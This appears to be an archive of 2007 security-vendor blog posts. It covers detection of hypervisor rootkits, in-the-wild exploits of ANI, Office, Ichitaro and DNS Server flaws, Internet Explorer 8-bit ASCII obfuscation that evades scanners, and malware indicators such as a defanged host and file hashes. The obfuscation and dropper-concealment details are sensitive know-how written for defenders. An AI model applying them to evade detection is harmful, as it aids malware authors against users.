The first session was the “Don’t tell Joanna” on Wednesday morning. The main point we got from that session is that it is very easy to detect virtualization rootkits. Speaking from my experience in the anti-rootkit space over twelve years, including my last project/product offered by McAfee “The McAfee Rootkit Detective”, I totally believe that “there is no rootkit that is undetectable”. I also tried to emphasize that fact in a McAfee podcast recorded before Black Hat. In their session Peter, Thomas and Nate focused more on time-based detection methods by calling an instruction that would cause the system to exit from the VM to the VMM, then measure the time elapsed until the execution is back to the VM and compare that with the regular time taken when running without the hypervisor. I have always liked that time-based approach and it was heavily discussed in Avert Labs some time ago, but we thought of using some other non-time based methods that rely on observing changes made to some processor status and cache fields like TLB (Translation Lookaside Buffers). Anyhow, after the session ended I talked for about an hour or more with Peter Ferrie – I told Peter that it was a very nice presentation and that my personal research findings support their conclusions although I use some different non-time based detection methods. Peter and I were wondering how Joanna would respond in her presentation in the afternoon.

Then came the afternoon and I was sitting there in the second row in front of Joanna. Joanna seemed a little bit nervous when she started her presentation. Initially Joanna picked again on Windows Vista by showing some Visa-signed drivers that allow anyone to write to any kernel memory or modify the MSR (Model Specific Register). That was nice but it is something we see every week at Avert Labs so nothing new in it to me at least. Then came the second part of Joanna’s presentation and she started to say how her Blue Pill rootkit can adjust the time stamp counters in such a way that would not allow any code to detect the overhead of running on top of a hypervisor. I made a comment in the form of a question during the presentation but Joanna said questions would be answered only after she finished the presentation. The point I wanted to make and maybe Joanna is reading this now, is that her argument of being able to fix the time stamp counters is not a strong technical argument for the following reasons:

1. This would require Blue Pill to emulate all the processor instructions that cause a VM exit and adjust the time stamp counter. Therefore we are no longer talking about a thin hypervisor that intercepts only specific instruction, interrupt, etc. but rather about a heavy hypervisor that would require significant amount of work from Joanna and her team.
2. The detection code can still issue arbitrary I/O requests to any I/O device that may be doing nothing but causing a VM exit and would then calculate the execution time. This would require Blue Pill to handle requests to I/O devices.
3. Manipulating time stamp counters does not seem to be a wise thing to do and there might be some device drivers that rely on the validity of those time stamp counters to perform correctly.

During the session I started questioning the value in spending all that time trying to build a Blue Pill that cannot be detected. There are many factors to consider like:

1. One day soon either hardware systems or operating systems will ship by default with a hypervisor. That hypervisor would have to be the first hypervisor and would not allow nested hypervisors. Intel has already produced the Intel AMT/vPro systems that ship with a hypervisor. Microsoft is soon to release the next version of its server platform that has a built-in hypervisor.
2. There are only a few commercial hypervisors and most provide some interface to the VM to communicate with the hypervisor if it exists. This interface can be used to authenticate the hypervisor. Security software can decide to halt the system if the system is not running on a hypervisor that is trusted by the company security policy. McAfee as a security company certainly encourages hypervisor vendors to pay more attention to those interfaces and make them solid enough to be used by security software running inside the VM.
3. Maybe Joanna can still claim that Blue Pill will emulate that commercial hypervisor interface, which is another layer in the system that would be emulated to hide its presence. Still we have a valid question: “what is this all about”. Eventually and very soon there will be only certain hypervisors that are trusted by the firmware and that’s it.

Anyhow, I felt kind of bored in the middle of the presentation and started to write a simple detection method that is not time-based and would definitely detect if the system is running on top of a hypervisor or not. This technique is based on some research I was doing less than a year ago at Avert Labs. Here is a scanned image of my hand writing of that approach made during Joana’s presentation.

Link to my Blue Pill notes here.

This detection method relies also on another major design flaw in the existing processor architecture. Here is some technical background: processors use TLBs (Translation Lookaside buffers) to cache the mapping from virtual (more accurately linear) addresses to physical addresses. But in doing that processors need to know where to get the address translation or mapping from. Well the mapping is stored inside the PTE (Page Table Entries). But the question is who would fill those entries inside the PTE? Well presumably (at least by the system designer) it’s the operating system of course. But guess what? PTEs themselves are writable and any code running in ring zero (like a device driver) can modify PTEs and hence change the mapping of linear addresses to physical addresses. Hah, this is the trick, and here is how the detection code works:

1. Allocate large contiguous block of non-paged memory;
2. Fill that allocated memory with character ‘A’;
3. Allocate another contiguous block of non-paged memory of the same size like block ‘A’;
4. Fill that second allocated memory with character ‘B’;
5. Freeze the execution of the operating system (do not ask how but we can do it);
6. Invalidate all TLB entries. There are processor instructions for that which could be as simple as moving execution “cr3, system_page_directory_table_address”;
7. Read the first byte of each page in the allocated ‘A’. This would cause those entries to be added to the processor TLB cache;
8. Change the mapping of the allocated ‘A’ pages to point to physical memory holding pages ‘B’. This means that what the processor uses inside the TLBs is not what is there in the PTE;
9. Call any instruction that would cause an exit to the hypervisor if it exists like CPUID. Exiting from the VM to the VMM causes the TLBs to be invalidated or cleared; and
10. Try to read the virtual memory of the first allocated block. If you see character ‘A’ then it means that the processor found entries in the TLBs and hence those entries were not cleared among an exit from the VM to the VMM. If it reads B, then it means that the TLB entries were invalidated due to the existence of the hypervisor and the processor has to use PTEs again to get the mapping from virtual to physical.

I wrote those steps briefly in my BlackHat conference block note and waited for the session to end. Then to my surprise just before the end of the presentation Joanna had a slide that mentioned a detection method similar to mine but without the step that freezes the system. I kind of felt proud of myself, of course, and showed the person next to me that I had it written in my block note. Anyhow, after briefly embracing that detection method Joanna said that it does not work and the people who came up with it did not try it. Well, that was too much! I have been researching that space for quite some time and I know it works!

After Joanna finished her presentation, off course, with no room for asking questions or making comments I felt that maybe I needed to talk with her. I waited until the crowd around Joanna was reduced to few people that included my friend Peter Ferrie, and I went to talk to Joanna. I told her “Joanna, this detection method that you mentioned at the end of your presentation should work and we have tried similar things.” Joanna looked at me and said no it does not. I said well I know it works. She then grabbed my conference ID and looked at my name while asking me who I am. I said Ahmed Sallam from McAfee Avert Labs. Joanna said she did not know that McAfee is working on that and I told her that we have been researching that area for some time. She then asked how it worked, I said that this is not a subject to be discussed in front in a crowd. But in all cases, Joanna, we can detect the Blue Pill so you may stop claiming that it is undetectable.

That was the end of the first day at Black Hat and I started to feel that we have been putting too much energy into something that may not deserve all the time and effort that we have been putting into it.

Now let’s get to the third session which was the “Kick Ass Hypervisoring: Windows Server Virtualization” by Brandon Baker from Microsoft, the following day. I went very excited to the session waiting for Microsoft to outline their plan for how to secure the hypervisor or to leverage the hypervisor for having better security. I heard none of that. As a matter of fact, Microsoft said that they are not utilizing the processor-based DMA remapping feature which allows true isolation of physical memory and hence protect against DMA-based physical memory attacks. We certainly understand that Microsoft is working hard to build its new hypervisor but we need to hear some good answers on Microsoft plans to make its hypervisor truly secured.

I hope that our blog readers now have a better understanding of this serious topic and would like to conclude this post by re-emphasizing on the importance of having an organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions.

Oh the irony: Apparently someone has taken issue with some of the things I have said about the Immunity Debugger, available from Immunity and posted about an alleged backdoor within the program to the full-disclosure mailing list! Below is a copy of beginning of the post:

From: goudatr0n
Date: Thu, 9 Aug 2007 13:58:01 -0400 (EDT)

2. OVERVIEW
The Immunity Debugger contains a backdoor that emails
session history, running applications and other system
information (location, IP address, machine Owner Name)
to an email address at immunitysec.com

The original post with full text and comments can be read here. Needless to say, I am not involved in any way. Let me restate that I think this to be a very powerful tool that was written for all the right reasons. My objections to it are how it can be used by all the wrong people to write more zero-day exploits, quicker and more efficiently. That puts users at risk. I know this is not the intent of the tool or Immunity.

I gotta say tho that anyone who takes the time to go through this much trouble to goof on me, I got nothing but love for!

DefCon gets quite a lot right and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect to DefCon.

Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc…. on a daily basis. Blogs, forums, podcast and other mediums allow us to stay bleeding edge. We have to. Most information in most presentations at most conferences is a good 6 months old (not always, but usually). This is where DefCon distances itself from the pack.

If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!) then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

* The Network @ DefCon
* 0wn the b0x
* Phreaking Challenge
* CTF (if you gotta ask…….)
* aCTF
* LPCON5 - Lockpicking Contest
* Hacker Jeopardy (one of my personal favorites)
* TCP/IP Drinking Game
* Wardriving Contest
* Wireless Village - ChurchofWiFi
* Lockpicking Village

No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh and the the Toxic BBQ! Part 2 later today…..

Our SiteAdvisor researchers have their own blog. It’s got fascinating content - these guy get to see all the nasties the web has to offer, so they have a fascinating array of videos, images and in-depth analysis of malware and phishing attacks.

Their most recent post is about Hosting Sites being targeted as places to host drive-by exploits. This underscores the trend we’ve been seeing of cybercriminals being on the cutting edge of technological innovations. Whenever there’s something new they can use that makes hiding and distributing their creations easier or more effective, they’ll be on it like rats on a cheetoh.

Be sure to add their blog to your list of sites to check for the latest news on all things web-security related!

As we talked about organized cyber crime on the rise, the script kiddies are not taking a break. CVE-2007-2221 was patched in MS07-027 on May 8th, 2007; barely two days after a proof of concept was published on the Internet. During the weeks that followed, we saw the original proof of concept exploit code posted onto hundreds of script kiddie websites and forums. Fine, all proof of concepts we’ve seen in the past already spread like fire; and CVE-2007-2221, a vulnerability for a non-default Windows service, is unlikely to have an impact quite like Exploit-AniFile.c. So what’s the big deal ?

Amusingly, we see many variations of the original proof of concept code. In most cases, we know they all originated from the same source because none of the comments or author’s name were changed (oh yes, script kiddies give credit too). Some impress with shellcode “boosters”, others rip off a heap buffer overflow “turbo-kit” from Exploit-VMLFill; all that for a vulnerability that doesn’t even cause a buffer overflow. With so much script kiddie goodies, it deserves a GUI script kiddie tool written by a 18-year old.

What brought this to our attention was an in-the-wild discovery of Exploit-CVE2007-2221. We believe this would be the first time that a malicious exploit for CVE-2007-2221 is discovered in the wild. Exploit-CVE2007-2221 is abusing a vulnerability in a Microsoft Windows Media Server 4.1 component through Internet Explorer. When successful, attackers can overwrite any files on the victim’s machine with malware.

The discovered exploit code was hosted on hxxp://web733{blocked}914.{blocked}.128web.com which was reportedly hosting the infamous Exploit-AniFile.c back in March 2007. At the time of writing, the malicious payload was no longer available for download. Exploit-CVE2007-2221 used on this site was, as you guessed, generated with that “shellcode-enhanced” script kiddie tool.

As for the malicious sites which are monitored by McAfee Avert Labs, some are dead, moved or no longer host exploit codes. However, as long as site administrators do not enforce a policy of taking malicious sites down, many can continue to seek opportunities to host new malware, and will be awakened whenever a new exploit made available for their malicious activities. But did they tell you the exploit code doesn’t even have to make sense ?

Last month we posted a blog entitled Malware Exploits Microsoft “Feature” Along With Vulnerabilities. What prompted the creation of that entry was the discovery of malware exploiting the way Internet Explorer handles character encoding, an issue that was first reported last year. Since then we’ve been tracking the posting of exploits targeting this vulnerability. To date we’ve identified 256 obfuscated pages hosted on 198 unique domains. This Google Map plots the geographic location of the servers hosting the malicious files.

As you can see, the majority of servers are hosted in China. What is ironic here is that the reason the flaw exists is due to the handling of US-ASCII encoded pages. The code exists for the “benefit” of English-reading viewers, and yet non-English users are the ones most targeted. Attacks can be successful on such targets due to the manual specification of US-ASCII character encoding within the malicious HTML pages. It doesn’t matter if the victims configured their browsers to use a different character encoding; whichever encoding type is specified within the HTML is the one used by Internet Explorer.

We took a sampling of 89 URLs to catalog the payloads of the malicious code. We found that in virtually all cases, patched Internet Explorer vulnerabilities lay beneath the obfuscation layer. It is fairly common for one page to contain multiple exploits. Here’s a breakdown of the exploits obfuscated:

19 of the obfuscated pages were very obviously created with a readily available exploit creation tool. (The page authors didn’t bother removing the comments that make it obvious how the pages were created.)

We also found that in the vast majority of cases, the final payload of these exploits had been removed, and yet the pages that led victims to those absent payloads were still present. Additionally, a third of the pages charted as MS07-017 exploits had the target ANI files removed. All that remains is the HTML pointers to the files (which, all things considered, we assume contained MS07-017). Perhaps a method of content scanning was used that couldn’t recognize, or decode, the obfuscation.

Finally, four of the domains involved in the attacks are associated with Chinese government sites (.gov.cn), and at least two others rely on social engineering in that they are similar to trusted sites.

So where is this all headed?
As we stated last month, this vulnerability has been discussed before. Given the uptick in malicious usage, the concentration of attacks originating from (and targeting) China, and this all coming about on the heels of the worst vulnerability affecting Microsoft Vista to date (which was disclosed after public exploitation was discovered–in China), we can expect Microsoft to release an official statement on this issue sooner or later. The longer this issue goes unaddressed, the more likely it is that a new IE zero-day attack will leverage this method of obfuscation to conceal its presence just a little bit longer.  And the likelihood of such an attack emanating from China is higher than anywhere else right now. Unfortunately it might just take such an event for this issue to become a priority.

As one of the Researchers responsible for the McAfee Avert Labs Security Advisories, my job is to find and report on issues that could affect our customer’s networks and resources in any number of negative ways.

Let’s face it, with vulnerabilities released almost constantly it’s extremely difficult for administrators to not only find all the latest threats, but to also map them to how well they can mitigate against them. Questions like, “Does my defense-in-depth strategy protect me against vulnerability X?” or “How does this new malware affect my remote VPN hosts?” will replace those sugar-plum dreams quicker than you can say ‘covered’. Vulnerabilities, exploits and patches are published at a pace that seems to increase daily. Sometimes these are coordinated in ‘responsible disclosure’ ways with coordinated researcher/vendor notification. More often than not however, they are not. Ever hear of the term ‘Zero Day’?

As the aforementioned threat researcher by trade, I would like to give you a little narrative about the basics one may follow to find and mitigate threats. You may not have the resources available to you such as several research teams that are dedicated to discovery like McAfee and others do, so just adjust to your size pond as necessary.

Step One. Grab your net.

You obviously want to have the biggest net possible to gather the most issues. This is true in threat discovery as well as in fishing (notice, no ‘ph’ pun here). Like the growing numbers of disclosures, the sheer numbers of sources can overwhelm. Just think - how many URLs are in your ’security favorites’? Or how many newsletters and RSS feeds do you subscribe to? Can you possibly cover them all? Sticking with the ‘heavy-weights’ is a safe bet for major issues, but what about one-offs that are published on obscure sites? Be sure to grab as many resources as feasible to use the biggest net.

Step Two. Evaluate the net.

Now that you have the mother-of-all fishnets, evaluate it. If the holes are too big, you may let the fish slip through. If the holes are too small, you can gather way more information than you could possibly use – let alone even care about. A local denial-of-service vulnerability in Joe Bob’s Digital 8-Track Player most likely does not warrant review. This is especially true when a vulnerability will certainly be popping up in a more widely-used application. Fishnets have holes for a reason. Pinpointing your sources can assist in making sure the holes are just the right size.

You may have resource limitations that limit the amount of data you can process - so relevance is important. Remember, pure security is about defending what you can –and- accepting the risk for what you can’t. (Of course, tell your boss that right?)

When looking for threats, evaluate the needs of your enterprise before-hand. A list of applications that can be found on any important host is a start. That way, when you discover an issue - you can reference this list and correlate quickly with what is important to you. Although really nice, an asset inventory application may not fit your budget. Script up some quick and dirty code to scan an Excel doc if need be. Just be sure that you are capturing only the relevant threats - information overload can become your enemy when attempting to determine a threat’s importance.

Step Three. Evaluate the catch.

So now you’ve thrown the net and pulled in the catch. That’s a lot of food – or is it? What you find in your net may range from the best-of-breed sport fish to the algae feeding bottom dwellers. You may not even know if they are edible.

Now you need to filter the most pressing issues. Risk ratings (another topic for another day) alone may or may not tell the whole story - there are few across-the-board standards for ratings. You need to just jump in and look at the threat and determine its potential impact. Ask yourself questions like: Does it execute code? Does it execute code remotely? Is user interaction needed? Is there a public exploit? Follow the Threat to its end-result if it was successfully exploited and make a list of ones to watch for, in order of importance.

You can now compare the list of issues with your defense audits. (You have done your audits to know what you’ve got to defend with, potential threat vectors, and user account access to name a few - right?) Follow the path an attacker may use from external and internal start points to the most valuable of assets that may be affected. Along these points you will know where your defenses lie. This will get you a list of changes that need to be made in order to mitigate, or that will allow you to have some time before patching.

Step Four. Fish Fry

Now that you have chosen the net, cast it, and sorted your catch, you can go out and fry up the perfect one that didn’t get away.

Armed with a plan, you can set about defending against the most potent of threats.

A new Nirbot variant has been discovered that attempts to exploit the recent zero day vulnerability in Microsoft’s DNS Server Service (CVE-2007-1748).

Vulnerability to Worm Timeline:

• April 7 - This vulnerability was first reported by SANS in what was believed to be a targeted attack
• April 12 - Microsoft posted Microsoft Security Advisory (935964)
• April 14 - An exploit was made public
• April 15 - Three other exploits were made public
• April 15 - The first worm was submitted to McAfee Avert Labs late in the day

Analysis is on going. More details will be posted here.

Update April 16, 20:30 PDT
A second variant has been discovered.

First Variant
File Name: mdnex.exe (writes c:\U.exe)
File Size: 199,680 bytes
MD5: 0xc1a6a22b2415ba608fb894b4e036e19c

Second Variant
File Name: mozila.exe (writes c:\U.exe)
File Size: 270,848 bytes
MD5: 0×8f6cb8d895e60387fe3e41377d0f0d3f

On April 6th, 2007, our heuristics proactively detected a new document exploit for Ichitaro, a popular Japanese word processor, that was being exploiting a new 0-day vulnerability in the wild. The vendor was notified immediately and confirmed we have identified a new and previously unknown vulnerability. This follows the other 0-day vulnerability for Ichitaro that was exploited in the wild in August the previous year.

The specially crafted document (Exploit-TaroDrop.b) came with a Japanese filename with extension “.jtd” that is used by Ichitaro.

When users open this document, Exploit-TaroDrop.b causes a buffer overflow, executes shellcode, drops a malware called %Windir%\System32\downhk.exe (BackDoor-DKI.dldr) and silently terminates. Before the user could realize the disruption, Ichitaro is restarted and they can continue to view the document but with a different filename “a.jtd”.

What goes on behind the scenes was really Exploit-TaroDrop.b taking control over code execution from Ichitaro after a buffer overflow occurred and caused the application to terminate. The malware author attempts to “repair” the user experience by dropping a clean document that can be viewed in Ichitaro so as not to arouse any suspicion.

We are seeing similar methods used in the other document type exploits for Microsoft Office applications. Although this method may vary in other cases, it would be worth checking the filename in the application title bar, and take note of any abnormal behavior as such.

We can expect malware authors to continue discovering and creating new exploits in localized (and often neglected) applications; and using various social engineering methods to keep these threats undetected. Users must be armed with both advanced heuristics and good vigilance and intuition and even then threats like these are going to be increasingly difficult to track and defend against.

A security patch is being developed by the vendor to deal with this vulnerability.

This malware was reported by both Shinsuke Honjo and Geok Meng Ong of McAfee Avert Labs.

Danger And Benefits of Obfuscation
Most of the malicious code we see on a daily hourly basis is obfuscated in one way or another. PE (portable executable format) files are packed (compressed and/or encrypted), scripts are encoded and/or encrypted, etc. Obfuscation is one of the biggest challenges for content scanners today, both on the host and on the wire. Emulation has been instrumental in getting past layers of obfuscation without the need for custom decryption code with each passing threat, by allowing malicious code to decrypt itself in a “sandbox”. However, over time anti-emulation, anti-debugger, and more generally anti-deobfuscation techniques have made this more challenging; and along with emulation, comes a performance impact. But, there are more rudimentary ways to tackle this problem.

Obfuscation is a double edged sword. At some point, the methods used go to such an extreme to evade detection, that the method itself is enough to base detection. In October last year, an obfuscation module was introduced for a popular penetration testing toolkit. One of the methods used involves generating random white space inside of HTML exploits. This tactic can evade detection in some cases, but this “noise” itself can be enough to trigger on. Valid files do not typically contain such noise. This paradox is present in other areas of threat tactics as well. Take social engineering for example. Email spam, and even viruses, that are so overwhelmingly written to trick users into taking some action often stick out like a soar thumb. Another example is the plethora of threats that do not function in typical forensic environments used by researchers. Today it seems that more bots are built to NOT run under virtual machine environments than those that are. The result—many infections can be avoided by simply by running in a virtual environment. As more and more users run virtual machines, the anti-researcher technique becomes a hindrance to the malware.

Internet Explorer “Feature” Exploited
In June 2006, an issue was reported in the way Internet Explorer interprets ASCII characters. IE only takes into account 7-bits while interpreting ASCII encoded 8-bit streams, ignoring the most significant bit (8th bit). For example, both values shown below are interpreted as character ‘A’ if we consider only 7-bits and ignore the 8th, but the representation is different if all 8-bits are accounted for. Other browsers however do not show this behavior.

This issue has been discussed before and it seems due to the ambiguity in specifications, it cannot exactly be considered as a bug in IE. Whether Microsoft got it right in IE and most everyone else got it wrong (including Mozilla and Opera), or the other way around, it is a challenge for most traditional anti-malware scanners when looking at 8-bit character representations of web pages. This technique can be used for malicious purposes and otherwise-known threats can suddenly “appear unknown” to scanners and yet render fine with IE. We ran a small test by “encoding” some of the well known and detected threats using this technique, and none of the AV scanners tested passed (including Microsoft’s).

Obviously, this problem can be solved. Either by fixing the bug/feature in IE or by updating most content scanners to function the way that IE behaves.

There may be another option. Like the aforementioned obfuscation techniques, this encoding poses a hindrance in detection and at the same time opens a window for some proactive detection where existence of 8-bit characters with values greater that 0×7F (maximum possible with 7-bit) can be considered suspicious in the context of ASCII encoded web pages.

Real-World Attack
McAfee Avert Labs has been monitoring this technique being employed in the wild for malicious purposes. In one recent case, the payload exploits MS06-055, a patched Microsoft VML vulnerability to download the W32/Fujacks.ab virus.

Fujacks.ab is a variant of Fujack.aa (the first known worm to leverage the recent ANI file handling vulnerability). The nefarious group behind these Fujack variants was one of the frontrunners in hosting ANI exploits (patched in MS07-017). So not only were they early adopters of ANI file exploitation, they were also early adopters of 8-bit ASCII malware obfuscation.

The MS06-055 exploit connected with Fujacks.ab utilizes obfuscation techniques discussed in the first section of this blog, and is proactively detected as Exploit-ObscuredHtml as a result. Also VirusScan’s ScriptScan is able to see past the 8-bit ASCII encoding and detects as JS/Exploit-BO.gen.

It is interesting to note that none of the other AV scanners tested detect this obfuscated sample even though many do detect once decoded.

McAfee ScriptScan to the Rescue
Emulation can be an effective way to get underneath obfuscation, but anti-emulation techniques may circumvent this approach. McAfee VirusScan products contain a feature known as ScriptScan. ScriptScan is a technology capable of scanning beyond the obfuscated layer in client-side web script files. Most obfuscated scripts contain simple but redundant arithmetic algorithms and variable randomization that bypasses most file scanners. They are a challenge to products that only scan these files at the top layer because legitimate scripts can contain similar algorithms. ScriptScan monitors script execution in Microsoft Internet Explorer (IE) and scans the underlying scripts exactly as decoded by IE. More critically, scripts must be decoded to run and ScriptScan is initiated before they can execute; effectively blocking malicious scripts from execution.

Why Many Comparative Tests Are Flawed
While our tests show a lack of file detection, they are admittedly flawed. They are flawed for the same reason that VirusTotal and a number of other comparative tests are flawed; they don’t test threats in their real-world environment. 8-bit ASCII obfuscated threats may not be detected by command-line, on-demand, or even certain on-access scanners. However, if those threats are scanned in the course of being rendered by Internet Explorer, the obfuscation is removed (which is what allows VirusScan’s ScriptScan to detect). It is unclear how many AV products contain this feature. While such an approach is not possible at the gateway, emulation may be a partial solution. Clearly a challenge with emulation is that one must code the emulator to mirror the behavior of the interpreter, in this case Internet Explorer. And by mirror, that includes coding in the same bugs and features, such as IE’s 8-bit ASCII decoding. It is believed that the majority of web content scanners do not handle such decoding the way IE does. It would be prudent for Microsoft to resolve this, and remove the capability from the hands of attackers.

Do you ever ask yourself why we talk so much about “another” vulnerability?

For starters, up until a few hours ago, this vulnerability was not covered by an official patch. Another good reason is the fact that we are seeing exploits in the wild.

And if that was not enough, now kits have been released that allow basically anyone to create his or her own exploits, making it a really simple task.

The video below shows exactly that–how easy is to create such exploits, so you can understand why you should worry and protect yourself.

Microsoft has released a patch for CVE-2007-1765 (aka CVE-2007-0038).  Anyone using a vulnerable system should install this patch ASAP. Hundreds of websites have been found to be hosting exploits, with thousands of websites and spam leading users to that malicious code.  The number of attacks is likely to rise steadily for several weeks if not months.  Exploit-ANIfile.c detection quickly rose to the number one spot on our consumer regional virus tracker chart for Asia, over the weekend.  We can expect the detection of this exploit to top the charts as the most widely seen exploit over the next few weeks as well.  Currently it is taking up the number six spot on the worldwide chart:

There has been some confusion around whether or not Vista is vulnerable to remote code execution.  I’ve posted this video to demonstrate this case.  Here, with DEP enabled (default settings), and IE7 running in protected mode, you will see a proof of concept in action.

Another follow-up to my Unpatched Drive-By Exploit Found On The Web post.

Last month Websense reported that the official website of Dolphin Stadium, host of Super Bowl XLI, was compromised and serving malicious code.  In fact that was a massive attack affecting thousands of websites.  Those sites were injected with a script reference that pointed to exploit code.  At that time, the code exploited known vulnerabilities.

The SANS Institute did some investigating into that incident.  They posted portions of a response they received from a system admin where it was clear that a remote attacker exploited a SQL injection vulnerability to embed the malicious script.  The same script is now serving the ANI file 0-day exploit reported yesterday.  Googling the referenced script yields 113,000 results.  It’s likely that most of those sites were compromised through SQL injection vulnerabilities.  Of course many of these sites have been cleaned up, malicious references removed, but not all.

In response to this issue, Microsoft has posted Security Advisory 935423. Microsoft states the following operating systems are vulnerable:

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 2
• Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003
• Microsoft Windows Server 2003 for Itanium-based Systems
• Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows Vista

Last night I had a chance to test Vista’s vulnerability. In the process of setting up the environment, I dragged and dropped a malicious ANI file to the desktop. This causes Vista to enter an endless crash-restart loop. I captured a video of this occurring.

Note, this crash-restart doesn’t represent current real-world attacks, which are delivered over the Web. Those attacks would likely come through a Web browser.

Several of my posts over the last few months have centered around very targeted zero-day attacks.  This post covers an exploit that McAfee researchers discovered in the field, posted to a message board.  That posting was simply a proof of concept; however McAfee Avert Labs has since received a malicious sample as well.  It is quite likely that similar exploits targeting this vulnerability are currently being used in other attacks on the web.

Preliminary tests demonstrate that Internet Explorer 6 and 7 running on a fully patched Windows XP SP2 are vulnerable to this attack.  Windows XP SP0 and SP1 do not appear to be vulnerable, nor does Firefox 2.0.  Exploitation happens completely silently.

The vulnerability lies in the handling of malformed ANI files.  Known exploits download and execute arbitrary exe files.  This vulnerability is reminiscent of MS05-002.

More information will be posted as it becomes available.

Update March 29 @ Noon
Additional information has been posted here:
http://www.avertlabs.com/research/blog/?p=233

This is an update to the update on CVE-2007-0870.

A few days ago I blogged about a new Word vulnerability that was used in a targeted attack (I know, it’s hard to keep these straight). Later that day Microsoft stated that the vulnerability was limited to denial of service, rather than remote code execution, and the blog was updated accordingly.

Well, since then our researchers continued to look at the issue, as did Microsoft’s. Today, McAfee Avert Labs’ analysis shows that this vulnerability is likely not limited to denial of service and that remote code execution may in fact be possible. Microsoft has also acknowledged that the vulnerability may not be limited to denial of service. Word 2000 and Word XP are believed to be vulnerable, though exploiting this flaw is non-trivial.

I suspect that a Microsoft Security Advisory for this issue will be released soon.

In related news, the team is currently analyzing proof-of-concept Excel files that were posted publicly today as “Microsoft Office Excel 2003 XLS File Denial Of Service”.

Update Feb 14, 6:15pm
A short while ago Microsoft did indeed release Microsoft Security Advisory (933052).

Earlier today Symantec posted a description for Trojan.PPDropper.G.  The vulnerability mentioned in the description has been assigned CVE-2007-0913.  SANS added it to their missing Microsoft patches table.

However, McAfee Avert Labs’ testing shows this issue was patched today in MS07-015 along with the Office Zero-Day reported by McAfee on February 2 (CVE-2007-0671).  This testing suggests Trojan.PPDropper.G may in fact be a PowerPoint version of the Office zero-day exploit used in Exploit-MSExcel.h.

We will post an update when we have more definitive information.

Update Feb 14,  2007
Microsoft has confirmed that this is patched in MS07-015 and related to CVE-2007-0671.

On the heels of my Zero-Day Excels Over Word blog, McAfee Avert Labs is currently investigating a new Word exploit.  Preliminary analysis shows that this is a different issue than those referenced in my last blog:

This new exploit may be somehow related to MS06-027 and the DAT files proactively detect this new threat as a variant of Exploit-MS06-027 since June 2006.  This threat appears to exploit Word 2000.  Again, this is preliminary analysis.  We are working with Microsoft to confirm the history of this vulnerability and will update the blog when we have more information.

Like many of the recent Word exploits, this appears to have been used in a very limited and targeted attack.

Update Feb 9, 1:30pm
Microsoft has acknowledged this issue.  They state that it is limited to a Denial of Service attack on Word 2000 and that code execution is not possible.

Denial of Service is clearly not as critical as other recent issues.  Looks like this targeted attack was flawed.

Update Feb 14, 4:30pm

Further analysis shows this is likely not limited to denial of service.  See Exploit Targeting Unpatched Word Vulnerability Spotted (Follow-up)

Malware authors have been at the cutting edge of incorporating exploit code into their creations for zero day vulnerabilities. Fueled by financial incentives and readily available source code, the bad guys of today aggressively pursue continued development of malware code. Over the years, the window between vulnerability discoveries to its incorporation into a worm or exploit candidate has shrunk from months, to weeks, to zero day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their networks. And during this vulnerable time frame if the network is hit with a bot that uses a zero-day vulnerability, an organization could be faced with a potential worm outbreak or large scale attack.

The chart below shows the time frame between the vulnerability being reported and how long it took for malware authors to incorporate it into a worm candidate.

The paper “Defeating bots on the internal network” from McAfee Avert Labs published in the Feb 2007 issue of Virus Bulletin describes setting up an IRC honeypot on a network using minimal resources and requiring little maintenance to be used as an early warning system to proactively alert botnet activity. Also discussed is using the internal IRC honeypot to gain control over infected machines and removing the bot from infected machines.

There have been numerous stories recently covering unpatched Microsoft Word vulnerabilities. For reference, the CVE designations for these vulnerabilities are:

• CVE-2006-5994
• CVE-2006-6456
• CVE-2006-6561
• CVE-2007-0515
• CVE-2007-0621 (Microsoft has stated that this is not a new, but related to CVE-2006-6456)

Recently McAfee Avert Labs added detection for Exploit-MSExcel.h, an Excel document that was submitted from the field. This exploit is consistent with other targeted zero-day attacks and is believed to be contained.

Microsoft has confirmed that this exploit targets an unpatched vulnerability. According to Microsoft’s Security Advisories Archive (Microsoft Security Advisories are released in advance of patch releases, not to be confused with Microsoft Security Bulletins), the only Excel-related security advisory in the past 20 months, was patched in MS06-037. Numerous other Excel-related patches have been released during this time.

Update Feb 2, 2007 at 7 pm PST
Microsoft Security Advisory (932553) has been released and CVE-2007-0671 has been assigned. Microsoft describes this vulnerability as affecting the following products:

• Microsoft Office 2003 
• Microsoft Office XP 
• Microsoft Office 2000
• Microsoft Office 2004 for Mac

From the advisory:

Workarounds for Microsoft Office Remote Code Vulnerability:
Microsoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.

• Do not open or save Office files that you receive from un-trusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted Office file.

McAfee Avert Labs has confirmed Microsoft’s testing; not opening malicious Office files successfully mitigates this threat.

While various bits of North America have seen wintry flurries in the past fortnight, those in computer security have seen a flurry of four Microsoft-related zero-day exploits.

The first three of these flaws affect Microsoft Visual Studio:

• Microsoft Visual Studio .CNT Buffer Overflow
• Microsoft Visual Studio .HPJ Buffer Overflow
• Microsoft Visual Studio .RC Vulnerability

The fourth flaws affects Microsoft Word:

• Microsoft Word 0-Day Vulnerability IV

All four flaws would allow a remote attacker to execute arbitrary code on a vulnerable machine. For an attack to occur in all four cases, user interaction is required; e.g., a user would have to visit a Web site that hosts a malicious file or open a malicious file locally.

